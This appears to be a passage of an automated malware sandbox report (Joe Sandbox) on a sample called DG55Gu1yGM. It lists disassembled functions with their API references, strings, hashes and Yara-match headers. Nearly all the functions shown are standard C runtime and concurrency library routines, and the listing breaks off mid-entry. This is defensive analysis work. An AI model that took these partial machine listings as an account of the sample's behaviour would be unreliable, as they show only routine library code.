Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0214E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0214E989
_free.LIBCMT ref: 0214E99F
_free.LIBCMT ref: 0214E9B0
_free.LIBCMT ref: 0214E9C1
_free.LIBCMT ref: 0214E9D8
GetCPInfo.KERNEL32(?,?), ref: 0214EA20

Part of subcall function 02156952: _free.LIBCMT ref: 021569BD

_free.LIBCMT ref: 0214EBCC
_free.LIBCMT ref: 0214EBDF
_free.LIBCMT ref: 0214EBED
_free.LIBCMT ref: 0214EBF8
_free.LIBCMT ref: 0214EC3A
_free.LIBCMT ref: 0214EC42
_free.LIBCMT ref: 0214EC4A
_free.LIBCMT ref: 0214EC52
_free.LIBCMT ref: 0214EC60

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 13acc8b90ade95fe423401a4d0c6b285cc40fb5bd95dfec3f1d9eaaeec69fb9a
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 66B19E719803099FDB21DF68C880BEEBBF5BF09304F1445AEE9A9A7241DB759941CF60

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0215A85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0215A8A3

Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C0F
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C21
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C33
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C45
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C57
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C69
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C7B
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C8D
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159C9F
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CB1
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CC3
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CD5
Part of subcall function 02159BF2: _free.LIBCMT ref: 02159CE7

_free.LIBCMT ref: 0215A898

Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9

_free.LIBCMT ref: 0215A8BA
_free.LIBCMT ref: 0215A8CF
_free.LIBCMT ref: 0215A8DA
_free.LIBCMT ref: 0215A8FC
_free.LIBCMT ref: 0215A90F
_free.LIBCMT ref: 0215A91D
_free.LIBCMT ref: 0215A928
_free.LIBCMT ref: 0215A960
_free.LIBCMT ref: 0215A967
_free.LIBCMT ref: 0215A984
_free.LIBCMT ref: 0215A99C

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: b69cd81466f2304e1f0b836994753dc1f5ffcf5f5b34d73cb6444a232e376082
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: C7317F31680221DFDB206F38D844B56B3E5AF00391F114AEEEC79D7650DB75A990CB94

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 0213EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0213F228,00000004,02137D87,00000004,02138069), ref: 0213EEF9
GetLastError.KERNEL32(?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000,?), ref: 0213EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000), ref: 0213EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0213EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF9D

Strings

advapi32.dll, xrefs: 0213EEF3, 0213EEF8, 0213EF14

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: cc09fa6a7055fca5e834df0d9c1b68eaec85b71a9b9486a4470bc088614157cc
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: AF217FB5944710FFE7117FB49C08A5ABBADEF05B16F104A2AF555E3600CB7C94418FA4

Function 0213EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0213F228,00000004,02137D87,00000004,02138069), ref: 0213EEF9
GetLastError.KERNEL32(?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000,?), ref: 0213EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0213F228,00000004,02137D87,00000004,02138069,?,02138799,?,00000008,0213800D,00000000,?,?,00000000), ref: 0213EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0213EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0213EF9D

Strings

advapi32.dll, xrefs: 0213EEF3, 0213EEF8, 0213EF14

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 8e894119037cb72a9466862d31b0ada3729a9ad3d0400ce45cdcd28c94560d05
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 3E218EB5944710FFE7117FA49C08A5ABBEDEF05B16F104A2AF595E3600CB7C94418BA8

Function 021324A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0213670B), ref: 021324B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021324C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021324D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0213670B), ref: 02132500
GetProcAddress.KERNEL32(00000000), ref: 02132507
GetLastError.KERNEL32(?,?,?,0213670B), ref: 02132522
GetLastError.KERNEL32(?,?,?,0213670B), ref: 0213252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132544
__CxxThrowException@8.LIBVCRUNTIME ref: 02132552

Strings

kernel32.dll, xrefs: 021324B0, 021324B5, 021324FA

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: f8e48c907d24b75a175b206222a804027a34ff00a9a99c912bda4accb47bc1bd
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: 0611A5769403117FE7167B746C59AAB7BAE9E06B137200536FC01E3191EF78DA008AAD

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

switchState, xrefs: 00424882
pContext, xrefs: 00424946

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 02140C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02140C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02140C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02140CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02140D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02140D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02140D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02140D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02140D80
__CxxThrowException@8.LIBVCRUNTIME ref: 02140DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02140DBC

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: a8ac6abef3c01d4486ce64037b120569f6e2354820833050a9f04b1a60a15706
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: 1741D230A84248DFCF19FFA5C4547ED77A7AF05304F1400A9D90E5B282CF369A49CB65

Function 0215204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02152061

Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9

_free.LIBCMT ref: 0215206D
_free.LIBCMT ref: 02152078
_free.LIBCMT ref: 02152083
_free.LIBCMT ref: 0215208E
_free.LIBCMT ref: 02152099
_free.LIBCMT ref: 021520A4
_free.LIBCMT ref: 021520AF
_free.LIBCMT ref: 021520BA
_free.LIBCMT ref: 021520C8

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 6c609239823de5438c0a6893d63afbaec13f49fb5edb18a0f8d2d63355340e67
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 22116076640118FFCB41EF94C845DD93BA6EF04390B5184E9BE288F221DB71EBA09F80

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

log10, xrefs: 0043EF0F, 0043EF5F
asin, xrefs: 0043F031
exp, xrefs: 0043EF8A, 0043EFEC
pow, xrefs: 0043EFA9, 0043F055, 0043F068
acos, xrefs: 0043F03D
sqrt, xrefs: 0043F049
log, xrefs: 0043EF6B, 0043EF77

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 02153190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
Instruction ID: 57f3f83d385dabd51e1ea2a1b20021acd865679b4994473eaaca4ee728b41167
Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
Instruction Fuzzy Hash: C9C1C070E84259EFDB16DFA8C840BAEBBB1AF09344F0441D9E875AB292C7349941CB61

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

fB, xrefs: 004287AE, 004287B7, 004287C8
csm, xrefs: 004287A6

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
PMDtoOffset.LIBCMT ref: 00428D4F

Strings

Bad dynamic_cast!, xrefs: 00428D91

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

Function 0040556E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

